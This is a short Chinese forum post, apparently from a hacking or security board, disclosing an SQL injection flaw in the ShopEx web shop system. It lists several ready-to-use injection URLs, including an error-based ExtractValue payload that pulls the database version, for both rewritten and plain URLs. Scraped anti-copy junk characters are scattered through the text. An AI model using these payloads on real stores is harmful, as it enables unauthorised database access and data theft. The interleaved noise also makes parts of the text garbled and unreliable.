注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… 6 o6 v9 I% B6 h
~8 c I- k# k, ^ d# A0 R好吧,我扯远了~~9 @8 N" O$ w+ w* W" C( I! [* T
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
! C. d# p' {3 f O不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
- |& K& n W/ Y i7 {$ R
/ _# Y' t7 T- I' m, W; Qhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 5 \7 S$ S1 ~8 v+ k- F6 O
9 ?4 r, _0 h2 T: q; `; e( {9 phttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 3 r& z! X& W6 `
3 }9 ]. r, R' |1 s+ \http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
9 X. |7 b& r, V$ n' C. J$ ]) c. z. N- \0 A: t- h& R
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html + V6 K8 b% U/ z1 Z5 v
( x. A1 p0 [; q" | 0 h: P5 U& d1 F" y* ?% S# p6 M
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。4 M* y' K* B5 n
如何注入就不多说了,10多年的东西了…不会也会了…
: ?: Z, H- L3 {
2 h: |& p, Q& b4 S2 ?9 A# d2 y) T4 r: A C. i
1 P4 C+ ~3 X2 {, ?8 y. Q8 U3 v3 b3 T9 _3 W, t& n
|